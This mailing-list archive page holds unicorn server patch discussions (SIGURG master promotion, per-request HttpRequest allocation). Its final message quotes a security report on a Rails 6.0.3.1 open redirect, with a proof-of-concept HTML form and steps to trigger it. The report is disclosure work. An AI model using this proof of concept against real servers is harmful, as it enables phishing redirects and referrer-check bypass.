Agreed. We're currently running unicorn as PID 1 inside containers
and I'm not exactly looking forward to having to monitor a PID file.

Another avenue I explored was to keep the existing master and
refork from one of the workers like puma, but re-assign the parent
to the original master using PR_SET_CHILD_SUBREAPER.

Here are my notes on how it works:

### Requirements:

- Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)
- Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimmed for older
  rubies.
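
For the first requirement, a hedged sketch of issuing the prctl(2) call
from Ruby without a C extension (the constant value comes from
linux/prctl.h; Linux-only, so it's guarded here):

```ruby
require 'fiddle'

PR_SET_CHILD_SUBREAPER = 36 # linux/prctl.h, Linux 3.4+

# Mark the calling process as a sub-reaper: orphaned descendants get
# re-parented to it instead of to PID 1.
def become_subreaper
  libc  = Fiddle.dlopen(nil)
  prctl = Fiddle::Function.new(libc['prctl'],
    [Fiddle::TYPE_INT] + [Fiddle::TYPE_LONG] * 4, Fiddle::TYPE_INT)
  prctl.call(PR_SET_CHILD_SUBREAPER, 1, 0, 0, 0).zero?
end

become_subreaper if RUBY_PLATFORM.include?('linux') # true on success
```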

### Flow:

- master: set `PR_SET_CHILD_SUBREAPER` during boot.
- master: create a temporary directory (`$TMP`).
- master: spawn initial workers the old way.

- master: on `SIGCHLD` (a child died):
  - Fake signal oldest worker (`SIGURG`).
  - Write the new worker number in the fake signal pipe (at the same time).

- worker: on `SIGURG` (should spawn a sibling):
  - Note: worker fake signals are processed after the current request is
    completed.
  - Run `before_fork` callback (MAYBE: need a special `before_refork`
    callback?)
  - create a pipe.
  - daemonize (fork twice so that the new process is attributed to the
    nearest `CHILD_SUBREAPER`, aka the original master).
  - wait for the first child to exit.
  - write into the pipe to signal the parent is dead.
  - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

- new sibling after fork:
  - wait for the parent to exit (through the temporary pipe).
  - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
  - create a pidfile at `$TMP/WORKER_NUM.pid`.
  - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
    block until the master open in write mode).
    - NB: Need to convert it to a `Kgio::Pipe` with
      `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` with `autoclose = false`.
  - Create the `Unicorn::Worker` instance with that pipe and worker number.
  - Send `SIGURG` to the parent process (should be the master).
  - Wait for `SIGCONT` in the named pipe.
  - enter the worker loop.

- master: on `SIGURG`:
  - for each outstanding refork order:
    - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
    - Read the pidfile
    - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
      - NB: Need to convert it to a `Kgio::Pipe` with
        `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` with `autoclose = false`.
    - Delete pidfile and named pipe.
    - Register that new worker normally.
    - Write `SIGCONT` into the pipe.
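
The FIFO handshake above could be sketched like so (hypothetical paths;
the point is the non-blocking open on the reader side, which avoids
blocking until a writer shows up):

```ruby
require 'tmpdir'

dir  = Dir.mktmpdir
pipe = File.join(dir, '0.pipe')
File.mkfifo(pipe)

# Reader opens with NONBLOCK so it doesn't wait for a writer...
reader = File.open(pipe, IO::RDONLY | IO::NONBLOCK)
# ...which lets a plain blocking writer open succeed immediately.
writer = File.open(pipe, IO::WRONLY)
writer.write('CONT')
writer.close
msg = reader.read # "CONT"
reader.close
```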

I can share the patch if you are interested, but the extra complexity
and Linux only features made me prefer the master-promotion approach.

> > However it works well enough for demonstration.
> >
> > So I figured I'd ask whether the feature is desired upstream
> > before investing more effort into it.
>
> It really depends on:
>
> 1) what memory savings and/or speedups can be achieved
>
> 2) what support can we expect from you (and other users) for
>    this feature and potential regressions going forward?
>
> I don't have the free time nor mental capacity to deal with
> fallout from major new features such as this, myself.

Yeah, this is just an RFC, I wouldn't submit a final patch without
first deploying it on our infra with good results. I'm just on the
fence between trying to get this upstream vs maintaining our own
server that solely works like this, hence somewhat simpler and that
can make more assumptions.

> The hook interface would be yet another documentation+support
> burden I'm worried about (and also more unicorn-specific stuff
> to lock people in :<).

Understandable. I suppose it can be done with a monitoring process.
Check `smaps_rollup` and send `SIGURG` when deemed necessary.

More moving pieces, but it keeps unicorn simpler.
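
Such an external monitor might amount to little more than this sketch
(field names follow Linux's smaps_rollup format; the threshold and signal
policy are made up for illustration):

```ruby
# Sum the shared pages reported for a process, in kB.
def shared_kb(pid)
  total = 0
  File.foreach("/proc/#{pid}/smaps_rollup") do |line|
    total += $1.to_i if line =~ /\AShared_(?:Clean|Dirty):\s+(\d+) kB/
  end
  total
end

# e.g. in the monitor's loop (hypothetical names):
#   Process.kill(:URG, master_pid) if shared_kb(worker_pid) < MIN_SHARED_KB
```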

> A completely different idea which should achieve the same goal,
> completely independent of unicorn:
>
>   App startup/loading can be made to trigger warmup paths which
>   hit common endpoints.  IOW, app loading could run a small
>   warmup suite which simulates common requests to heat up caches
>   and trigger JIT.

Yeah, I don't really believe in this for a few reasons:

  - That would slow boot time.
  - On large apps there are just too many codepaths for this to be realistic.
  - Many endpoints require database and other network access you probably
    don't want in the master.
  - Endpoints may have side effects.

> Ultimately (long-term for ruby-core), it would be better to make
> JIT (and perhaps even VM cache) results persistent and shareable
> across different processes, somehow...  That would help all Ruby
> tools, even short-lived CLI tools.  Portable locking would be a
> pain, I suppose, but proprietary OSes are always a pain :P

Based on my limited understanding of both JIT and VM caches, I don't think
that's really possible.

The VM itself could definitely do better CoW wise, and I have some proposals
on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
time and will never be perfect.

That's why I think periodically promoting a new master has potential.

> There's some line-wrapping issues caused by your MUA;

Urk. Ok, trying another client now, and I'll resend the patch.

> Perhaps documenting this as experimental and subject to removal
> at any time would make the addition of a major new feature an
> easier pill to swallow; but I still think this is better outside
> of app servers.

Up to you, if you don't feel like maintaining such a feature I would
perfectly understand.

---
 SIGNALS                        |   4 ++
 lib/unicorn.rb                 |   2 +-
 lib/unicorn/http_server.rb     | 115 +++++++++++++++++++++++++--------
 lib/unicorn/promoted_worker.rb |  40 ++++++++++++
 4 files changed, 134 insertions(+), 27 deletions(-)
 create mode 100644 lib/unicorn/promoted_worker.rb

diff --git a/SIGNALS b/SIGNALS
index 7321f2b..f5716b9 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
 * WINCH - gracefully stops workers but keep the master running.
   This will only work for daemonized processes.

+* URG - promote one of the existing workers as a new master, and gracefully
+  stop workers.
+  This will only work for daemonized processes.
+
 * TTIN - increment the number of worker processes by one

 * TTOU - decrement the number of worker processes by one
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..832f78d 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -133,6 +133,6 @@ def self.pipe # :nodoc:
 # :enddoc:

 %w(const socket_helper stream_input tee_input http_request configurator
-   tmpio util http_response worker http_server).each do |s|
+   tmpio util http_response worker promoted_worker http_server).each do |s|
   require_relative "unicorn/#{s}"
 end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..dd8f021 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -50,6 +50,7 @@ class Unicorn::HttpServer
   #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.3.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map(&:dup),
+    :generation => 0,
     0 => $0.dup,
   }
   # We favor ENV['PWD'] since it is (usually) symlink aware for Capistrano
@@ -106,7 +107,7 @@ def initialize(app, options = {})
     @orig_app = app
     # list of signals we care about and trap in master.
     @queue_sigs = [
-      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU ]
+      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU, :URG ]

     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
@@ -119,7 +120,24 @@ def initialize(app, options = {})

   # Runs the thing.  Returns self so you can run join on it
   def start
+    @new_master = false
     inherit_listeners!
+    promote
+
+    # write pid early for Mongrel compatibility if we're not inheriting sockets
+    # This is needed for compatibility some Monit setups at least.
+    # This unfortunately has the side effect of clobbering valid PID if
+    # we upgrade and the upgrade breaks during preload_app==true && build_app!
+    self.pid = config[:pid]
+
+    build_app! if preload_app
+    bind_new_listeners!
+
+    spawn_missing_workers
+    self
+  end
+
+  def promote
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
     @self_pipe.replace(Unicorn.pipe)
@@ -130,18 +148,6 @@ def start
     # Note that signals don't actually get handled until the #join method
     @queue_sigs.each { |sig| trap(sig) { @sig_queue << sig; awaken_master } }
     trap(:CHLD) { awaken_master }
-
-    # write pid early for Mongrel compatibility if we're not inheriting sockets
-    # This is needed for compatibility some Monit setups at least.
-    # This unfortunately has the side effect of clobbering valid PID if
-    # we upgrade and the upgrade breaks during preload_app==true && build_app!
-    self.pid = config[:pid]
-
-    build_app! if preload_app
-    bind_new_listeners!
-
-    spawn_missing_workers
-    self
   end

   # replaces current listener set with +listeners+.  This will
@@ -178,16 +184,16 @@ def logger=(obj)
     Unicorn::HttpRequest::DEFAULTS["rack.logger"] = @logger = obj
   end

-  def clobber_pid(path)
+  def clobber_pid(path, content = $$)
     unlink_pid_safe(@pid) if @pid
     if path
       fp = begin
-        tmp = "#{File.dirname(path)}/#{rand}.#$$"
+        tmp = "#{File.dirname(path)}/#{rand}.#{content}"
         File.open(tmp, File::RDWR|File::CREAT|File::EXCL, 0644)
       rescue Errno::EEXIST
         retry
       end
-      fp.syswrite("#$$\n")
+      fp.syswrite("#{content}\n")
       File.rename(fp.path, path)
       fp.close
     end
@@ -279,6 +285,11 @@ def join
       end
       @ready_pipe = @ready_pipe.close rescue nil
     end
+
+    if @promoted
+      Process.kill(:WINCH, Process.ppid)
+    end
+
     begin
       reap_all_workers
       case @sig_queue.shift
@@ -292,6 +303,13 @@ def join
           @logger.debug("waiting #{sleep_time}s after suspend/hibernation")
         end
         maintain_worker_count if respawn
+
+        if @new_master && @new_master.ready? && @workers.empty?
+          # TODO: we should handle the new master dying like with reexec.
+          clobber_pid(pid, @new_master.pid)
+          break
+        end
+
         master_sleep(sleep_time)
       when :QUIT # graceful shutdown
         break
@@ -305,10 +323,20 @@ def join
         soft_kill_each_worker(:USR1)
       when :USR2 # exec binary, stay alive in case something went wrong
         reexec
+      when :URG
+        if $stdin.tty?
+          logger.info "SIGURG ignored because we're not daemonized"
+        else
+          promote_new_master
+        end
       when :WINCH
         if $stdin.tty?
           logger.info "SIGWINCH ignored because we're not daemonized"
         else
+          if @new_master
+            @new_master.ready!
+          end
+
           respawn = false
           logger.info "gracefully stopping all workers"
           soft_kill_each_worker(:QUIT)
@@ -408,11 +436,30 @@ def reap_all_workers
         worker = @workers.delete(wpid) and worker.close rescue nil
         @after_worker_exit.call(self, worker, status)
       end
+
+      if @new_master && @new_master.ready?
+        @new_master.scale(@workers.size)
+      end
     rescue Errno::ECHILD
       break
     end while true
   end

+  def promote_new_master
+    # Promoting the oldest worker
+    # TODO: handle `@new_master` being dead.
+    if @new_master
+      logger.error "can't promote because worker=#{@new_master.nr} is being promoted"
+    elsif pair = @workers.first
+      @new_master = Unicorn::PromotedWorker.new(*pair, worker_processes)
+      @workers.delete(@new_master.pid)
+      logger.info "master promoting worker=#{@new_master.worker.nr}"
+      @new_master.promote
+    else
+      logger.error "can't promote because there is no existing workers"
+    end
+  end
+
   # reexecutes the START_CTX with a new binary
   def reexec
     if @reexec_pid > 0
@@ -516,10 +563,11 @@ def murder_lazy_workers
   end

   def after_fork_internal
+    self.worker_processes = 0
     @self_pipe.each(&:close).clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
-    @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
+    @ready_pipe = nil

     # The OpenSSL PRNG is seeded with only the pid, and apps with frequently
     # dying workers can recycle pids
@@ -545,6 +593,13 @@ def spawn_missing_workers
       unless pid
         after_fork_internal
         worker_loop(worker)
+
+        if @promoted
+          worker.tick = 0
+          promote
+          join
+        end
+
         exit
       end

@@ -678,19 +733,22 @@ def init_worker_process(worker)
     trap(:CHLD, 'DEFAULT')
     @sig_queue.clear
     proc_name "worker[#{worker.nr}]"
-    START_CTX.clear
     @workers.clear

     after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.close_on_exec = true }

     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    @config = nil
     build_app! unless preload_app
-    @after_fork = @listener_opts = @orig_app = nil
+    @listener_opts = @orig_app = nil
     readers = LISTENERS.dup
     readers << worker
     trap(:QUIT) { nuke_listeners!(readers) }
+    @promoted = false
+    trap(:URG) do
+      @promoted = true
+      START_CTX[:generation] += 1
+    end
     readers
   end

@@ -706,11 +764,11 @@ def reopen_worker_logs(worker_nr)

   def prep_readers(readers)
     wtr = Unicorn::Waiter.prep_readers(readers)
-    @timeout *= 500 # to milliseconds for epoll, but halved
+    @select_timeout = @timeout * 500 # to milliseconds for epoll, but halved
     wtr
   rescue
     require_relative 'select_waiter'
-    @timeout /= 2.0 # halved for IO.select
+    @select_timeout = @timeout / 2.0 # halved for IO.select
     Unicorn::SelectWaiter.new
   end

@@ -720,7 +778,7 @@ def prep_readers(readers)
   def worker_loop(worker)
     readers = init_worker_process(worker)
     waiter = prep_readers(readers)
-    reopen = false
+    promote = reopen = false

     # this only works immediately if the master sent us the signal
     # (which is the normal case)
@@ -739,12 +797,17 @@ def worker_loop(worker)
           process_client(client)
           worker.tick = time_now.to_i
         end
+        if @promoted
+          worker.tick = time_now.to_i
+          return
+        end
+
         break if reopen
       end

       # timeout so we can .tick and keep parent from SIGKILL-ing us
       worker.tick = time_now.to_i
-      waiter.get_readers(ready, readers, @timeout)
+      waiter.get_readers(ready, readers, @select_timeout)
     rescue => e
       redo if reopen && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
@@ -823,8 +886,8 @@ def build_app!
   end

   def proc_name(tag)
-    $0 = ([ File.basename(START_CTX[0]), tag
-          ]).concat(START_CTX[:argv]).join(' ')
+    $0 = ([ File.basename(START_CTX[0]), tag, "(gen: #{START_CTX[:generation]})",
+          ]).concat(START_CTX[:argv]).compact.join(' ')
   end

   def redirect_io(io, path)
diff --git a/lib/unicorn/promoted_worker.rb b/lib/unicorn/promoted_worker.rb
new file mode 100644
index 0000000..2595182
--- /dev/null
+++ b/lib/unicorn/promoted_worker.rb
@@ -0,0 +1,40 @@
+# -*- encoding: binary -*-
+
+class Unicorn::PromotedWorker
+  attr_reader :pid, :worker
+
+  def initialize(pid, worker, expected_worker_processes)
+    @pid = pid
+    @worker = worker
+    @worker_processes = 0
+    @expected_worker_processes = expected_worker_processes
+    @ready = false
+  end
+
+  def ready?
+    @ready
+  end
+
+  def ready!
+    @ready = true
+  end
+
+  def promote
+    @worker.soft_kill(:URG)
+  end
+
+  def scale(old_master_worker_processes)
+    diff = @expected_worker_processes -
+      old_master_worker_processes -
+      @worker_processes
+
+    if diff > 0
+      diff.times { kill(:TTIN) }
+      @worker_processes += diff
+    end
+  end
+
+  def kill(sig)
+    Process.kill(sig, @pid)
+  end
+end
-- 
2.35.1

^ permalink raw reply related	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  @ 2022-07-06  2:33  3% ` Eric Wong
  2022-07-06  7:40  2%   ` Jean Boussier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-06  2:33 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Unicorn relies on Copy on Write to limit applications' memory usage;
> however, Ruby's Copy on Write performance isn't exactly perfect.
> As code gets executed, various internal performance caches get warmed,
> which causes shared pages to be invalidated.
> 
> While there's certainly some improvements to be made to Ruby itself
> on that front, it will likely get worse in the near future if YJIT
> becomes popular, as it will generate executable code in the workers
> hence won't be shared.
> 
> One way effective CoW performance could be improved would be to
> periodically promote one worker as the new master. Since that worker
> processed some requests, VM caches, JITed code, etc should be somewhat
> warm already, hence shared pages should be dirtied less frequently after
> each promotion.

Agreed, there's potential for savings, here...

> Puma 5.0.0 introduced a similar experimental feature called
> `fork_worker` or `refork`.
> 
> It's a bit more limited though, as instead of promoting a new
> master and exiting, they only ask worker #0 to fork itself to
> replace its siblings. So once all workers are replaced, there
> are 3 levels of processes: cluster -> first_worker -> other_workers.

OK, any numbers from Puma users which can be used to project
improvements for unicorn (and other servers)?

> They also include automatic reforking after a predetermined amount
> of requests (1k by default).

1k seems like a lot of requests (more on this below)

> The happy path works pretty much like this:
> 
> - Assume daemonized mode.
> 
> - master: on `SIGURG`
>   - Forward `SIGURG` to a chosen worker.

OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

> - worker: on `SIGURG` (become a master)
>   - do the prep, register traps, open self-pipe, etc
>   - don't spawn any workers, set the number of workers to 0.
>   - send `SIGWHINCH` to master.
> 
> - old master: on `SIGWHINCH`
>   - Gracefully shutdown workers, like during a reexec.

nit: only one `H' in `SIGWINCH`

> - old master: when a worker is reaped.
>   - Send `SIGTTIN` to the new master
>   - If it was the last worker:
>     - replace pidfile
>     - exit
> 
> This patch is not exactly production quality yet:
> 
>   - I need to write some tests
>   - There's a race condition that can cause the promoted master
>     to have one less worker than required. Needs to be addressed.
>   - The pidfile replacement should be improved.
>   - Multiple corner cases like a `QUIT` during promotion are not handled.

Right.  PID file races and corner cases were painful to deal
with in the earliest days of this project, and I don't look
forward to having to deal with them ever again...

It looked like the world was moving towards socket-activation
with dedicated process managers and away from fragile PID files;
so being self-daemonization dependent seems like a step back.

> However it works well enough for demonstration.
> 
> So I figured I'd ask whether the feature is desired upstream
> before investing more effort into it.

It really depends on:

1) what memory savings and/or speedups can be achieved

2) what support can we expect from you (and other users) for
   this feature and potential regressions going forward?

I don't have the free time nor mental capacity to deal with
fallout from major new features such as this, myself.

> For this to be used in production without too much integration effort
> I think automatic promotion based on some criteria like number of
> request or process lifetime would be needed.
> 
> Ideally a hook interface to programmatically trigger promotion would
> be very valuable as I'd likely want to trigger promotion
> based on memory metrics read from `/proc/<pid>/smaps_rollup`.

The hook interface would be yet another documentation+support
burden I'm worried about (and also more unicorn-specific stuff
to lock people in :<).


A completely different idea which should achieve the same goal,
completely independent of unicorn:

  App startup/loading can be made to trigger warmup paths which
  hit common endpoints.  IOW, app loading could run a small
  warmup suite which simulates common requests to heat up caches
  and trigger JIT.

  That would be completely self-contained in each app and work
  on every single app server; not just ones with special
  provisions to deal with this.  Of course, CoW-aware setups
  (preload_app) will still have the advantage, here.

  Best of all, it could be deterministic, too, instead of
  waiting and hoping 1k random requests will be sufficient
  warmup, developers can tune and mock exactly the requests
  required for warmup.  Of course, a lazy developer could replay
  1k requests from an old log, too.
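The warmup idea above could look something like this (a minimal, hypothetical sketch; the paths, env keys, and trivial app are stand-ins):

```ruby
require 'stringio'

# Hypothetical warmup sketch: after the app loads (and, with
# preload_app, before workers fork so heated caches are shared via
# CoW), replay a fixed set of representative requests straight into
# the Rack app.  Paths and env keys here are illustrative.
WARMUP_PATHS = %w[/ /login /api/status].freeze

def warmup(app)
  WARMUP_PATHS.map do |path|
    env = {
      'REQUEST_METHOD' => 'GET', 'PATH_INFO' => path,
      'QUERY_STRING' => '', 'SERVER_NAME' => 'localhost',
      'SERVER_PORT' => '80', 'rack.input' => StringIO.new(''),
      'rack.errors' => $stderr,
    }
    status, _headers, body = app.call(env)
    body.close if body.respond_to?(:close)
    status
  end
end

# deterministic: exactly these requests, not 1k random ones
STATUSES = warmup(->(_env) { [200, {}, []] })
```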


Ultimately (long-term for ruby-core), it would be better to make
JIT (and perhaps even VM cache) results persistent and shareable
across different processes, somehow...  That would help all Ruby
tools, even short-lived CLI tools.  Portable locking would be a
pain, I suppose, but proprietary OSes are always a pain :P

>  4 files changed, 134 insertions(+), 27 deletions(-)
>  create mode 100644 lib/unicorn/promoted_worker.rb

There's some line-wrapping issues caused by your MUA;
I got this from "git am":

  warning: Patch sent with format=flowed; space at the end of lines might be lost.
  Applying: Master promotion with SIGURG (CoW optimization)
  error: corrupt patch at line 14

The git-format-patch(1) manpage has a section for Thunderbird users
which may help.

> --- a/SIGNALS
> +++ b/SIGNALS
> @@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
>  * WINCH - gracefully stops workers but keep the master running.
>    This will only work for daemonized processes.
> 
> +* URG - promote one of the existing workers as a new master, and gracefully
> +  stop workers.
> +  This will only work for daemonized processes.

Perhaps documenting this as experimental and subject to removal
at any time would make the addition of a major new feature an
easier pill to swallow; but I still think this is better outside
of app servers.

^ permalink raw reply	[relevance 3%]

* Re: Potential Unicorn vulnerability
  2021-03-12 12:00  4%         ` Eric Wong
@ 2021-03-12 12:24  0%           ` Dirkjan Bussink
  0 siblings, 0 replies; 200+ results
From: Dirkjan Bussink @ 2021-03-12 12:24 UTC (permalink / raw)
  To: Eric Wong; +Cc: John Crepezzi, Kevin Sawicki, unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1404 bytes --]

Hi Eric,

> On 12 Mar 2021, at 13:00, Eric Wong <normalperson@yhbt.net> wrote:
> 
> I was going to say I didn't have a preference and the
> current approach was fine...
> 
> However, I just now realized that clobbering+replacing all
> of @request is required.
> 
> That's because env['rack.input'] is (Stream|Tee)Input,
> and that is lazily consumed and those objects keep state in
> @request (as the historically-named @parser)
> 
> If we're to make env safe to be shipped off to another thread,
> then @request still needs to stick around to maintain state
> of env['rack.input'] until it's all consumed.


Ah yeah, that’s a good point. I don’t think this affects us right
now so the existing patch still keeps us safe, but it would break this
case then indeed.

> It probably doesn't affect most apps out there that just decode
> forms via HTTP POST; but the streamed rack.input is something
> that's critical for projects that feed unicorn with PUTs via
> "curl -T"

Ah yeah. So do you think that on top of the current patch we’d need
something like the attached patch (which moves the @request allocation),
or would only the latter patch be needed then?

In the latter case there’s still a bunch of logic for Rack hijack around
then which might not be needed at that point, but I’m not entirely sure
how that would look like.

Cheers,

Dirkjan


[-- Attachment #2: 0001-Allocate-a-new-request-for-each-client.patch --]
[-- Type: application/octet-stream, Size: 1579 bytes --]

From 58c4c153ba6c007284771c0899798a14df28c7c3 Mon Sep 17 00:00:00 2001
From: Dirkjan Bussink <d.bussink@gmail.com>
Date: Fri, 12 Mar 2021 13:22:25 +0100
Subject: [PATCH] Allocate a new request for each client

This removes the reuse of the parser between requests. Reusing these is
risky in the context of running any other threads within the unicorn
process, also for threads that run background tasks.

If any other thread accidentally grabs hold of the request it can modify
things for the next request in flight.

The downside here is that we allocate more for each request, but that is
worth the trade off here and the security risk we otherwise would carry
to leaking wrong and incorrect data.
---
 lib/unicorn/http_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index c0f14ba..22f067f 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -69,7 +69,6 @@ class Unicorn::HttpServer
   # incoming requests on the socket.
   def initialize(app, options = {})
     @app = app
-    @request = Unicorn::HttpRequest.new
     @reexec_pid = 0
     @default_middleware = true
     options = options.dup
@@ -621,6 +620,7 @@ def e100_response_write(client, env)
   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
   def process_client(client)
+    @request = Unicorn::HttpRequest.new
     env = @request.read(client)
 
     if early_hints
-- 
2.30.1


^ permalink raw reply related	[relevance 0%]

* Re: Potential Unicorn vulnerability
  @ 2021-03-12 12:00  4%         ` Eric Wong
  2021-03-12 12:24  0%           ` Dirkjan Bussink
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-03-12 12:00 UTC (permalink / raw)
  To: Dirkjan Bussink; +Cc: John Crepezzi, Kevin Sawicki, unicorn-public

Dirkjan Bussink <dbussink@github.com> wrote:
> Hi Eric,
> 
> > On 12 Mar 2021, at 10:41, Eric Wong <normalperson@yhbt.net> wrote:
> > 
> > I'm not in favor of new options since they add support costs
> > and increase the learning/maintenance curve.
> > 
> > What I've been thinking about is bumping the major version to 6.0
> > 
> > Although our internals are technically not supported stable API,
> > there may be odd stuff out there similar to OobGC that uses
> > instance_variable_get or similar things to reach into internals.
> > Added with the fact our internals haven't changed in many years;
> > I'm inclined to believe there are other OobGC-like things out
> > there that can break.
> > 
> > Also, with 6.0; users who completely avoid Threads can keep
> > using 5.x, while others can use 6.x
> 
> That sounds like a good plan then. Once there’s a new version we can
> bump that on our side to remove the manual patch then.

OK.  I think it's safe to wait a few days for more comments
before releasing in case there's more last-minute revelations
(see below :x)

> > Btw, did you consider replacing the @request HttpRequest object
> > entirely instead of the env and buf elements?
> > I suppose that's more allocations, still; but could've
> > been a smaller change.
> 
> Ah, that’s a very good point. I think that would also have been a valid
> approach but it does indeed add more allocations. If that approach would
> be preferred, I think it can also be changed to that?
> 
> I don’t really have a strong preference on which approach to take here,
> do you?

I was going to say I didn't have a preference and the
current approach was fine...

However, I just now realized that clobbering+replacing all
of @request is required.

That's because env['rack.input'] is (Stream|Tee)Input,
and that is lazily consumed and those objects keep state in
@request (as the historically-named @parser)

If we're to make env safe to be shipped off to another thread,
then @request still needs to stick around to maintain state
of env['rack.input'] until it's all consumed.

It probably doesn't affect most apps out there that just decode
forms via HTTP POST; but the streamed rack.input is something
that's critical for projects that feed unicorn with PUTs via
"curl -T"

> > Oops, was that the integration tests in t/* ?
> 
> Nope, looks like some platform behavior changes (tried on MacOS first).
> I was able to get the tests running and working on Debian Buster this
> morning before I sent a new version of the patch and they are all passing
> there for me locally.

Ah, no idea about MacOS or any proprietary OS; I've never
considered them supported.  But yeah, it should work on any
GNU/Linux and Free-as-in-speech *BSDs

^ permalink raw reply	[relevance 4%]

* Re: [RFC] http_response: ignore invalid header response characters
  2021-01-28 22:39  5%         ` Eric Wong
@ 2021-02-17 21:46  0%           ` Sam Sanoop
  0 siblings, 0 replies; 200+ results
From: Sam Sanoop @ 2021-02-17 21:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Since no one is against this patch being applied, and it's been a few
months since this discussion opened, can you look into this soon,
Eric?  Thanks.


On Thu, Jan 28, 2021 at 10:39 PM Eric Wong <bofh@yhbt.net> wrote:
>
> Sam Sanoop <sams@snyk.io> wrote:
> > Hi Eric, did you get a chance to look at this? any thoughts on patching?
>
> Not yet; still stuck and behind on another project...
>
> Was hoping maybe somebody else paying attention to unicorn-public
> would chime in (no idea how many people read it between all
> the archives and HTTPS/IMAP/NNTP endpoints).
>
> Maybe I'll have a chunk of time this weekend...



-- 

Sam Sanoop
Security Analyst

^ permalink raw reply	[relevance 0%]

* Re: [RFC] http_response: ignore invalid header response characters
  @ 2021-01-28 22:39  5%         ` Eric Wong
  2021-02-17 21:46  0%           ` Sam Sanoop
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-01-28 22:39 UTC (permalink / raw)
  To: Sam Sanoop; +Cc: unicorn-public

Sam Sanoop <sams@snyk.io> wrote:
> Hi Eric, did you get a chance to look at this? any thoughts on patching?

Not yet; still stuck and behind on another project...

Was hoping maybe somebody else paying attention to unicorn-public
would chime in (no idea how many people read it between all
the archives and HTTPS/IMAP/NNTP endpoints).

Maybe I'll have a chunk of time this weekend...

^ permalink raw reply	[relevance 5%]

* Re: [RFC] http_response: ignore invalid header response characters
  @ 2021-01-13 23:20  3%   ` Sam Sanoop
    0 siblings, 1 reply; 200+ results
From: Sam Sanoop @ 2021-01-13 23:20 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Hi, the researcher didn't test it with Nginx; his configuration
according to the report was:

server: unicorn (<= latest)
Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production


But reading http://blog.volema.com/nginx-insecurities.html, CRLF can
be allowed if a user is using $uri variables within their NGINX
config. So conditions within NGINX would need to be met.

Regarding the hackerone report, here is a txt version of the report:


ooooooo_q-----------------

Hello,
I was looking at the change log
(https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2)
for CVE-2020-8185 and found another problem existed.

https://github.com/rails/rails/blob/v6.0.3.1/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb#L21

  redirect_to request.params[:location]
end

private
  def actionable_request?(request)
    request.show_exceptions? && request.post? && request.path == endpoint
  end

  def redirect_to(location)
    body = "<html><body>You are being <a
href=\"#{ERB::Util.unwrapped_html_escape(location)}\">redirected</a>.</body></html>"

    [302, {
      "Content-Type" => "text/html; charset=#{Response.default_charset}",
      "Content-Length" => body.bytesize.to_s,
      "Location" => location,
    }, [body]]
  end
There was an open redirect issue because the request parameter
location was not validated.
In 6.0.3.2, since the condition of actionable_request? has changed,
this problem is less likely to occur.

PoC
1. Prepare server
Prepare an attackable 6.0.3.1 version of Rails server

❯ rails -v
Rails 6.0.3.1

❯ RAILS_ENV=production rails s
...
* Environment: production
* Listening on tcp://0.0.0.0:3000
2. Attack server
Prepare the server for attack on another port.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=https://www.hackerone.com/">
    <button type="submit">click!</button>
</form>
python3 -m http.server 8000
3. Open browser
Open the http://localhost:8000/attack.html url in your browser and
click the button.
Redirect to https://www.hackerone.com/ url.



Impact
It will be fixed with 6.0.3.2 as with
CVE-2020-8185(https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0),
but I think it is necessary to announce it again because the range of
influence is different.

This open redirect changes from the POST method to the GET method, so it
may be difficult to use for phishing. On the other hand, it may affect
bypass of referrer checks or SSRF.



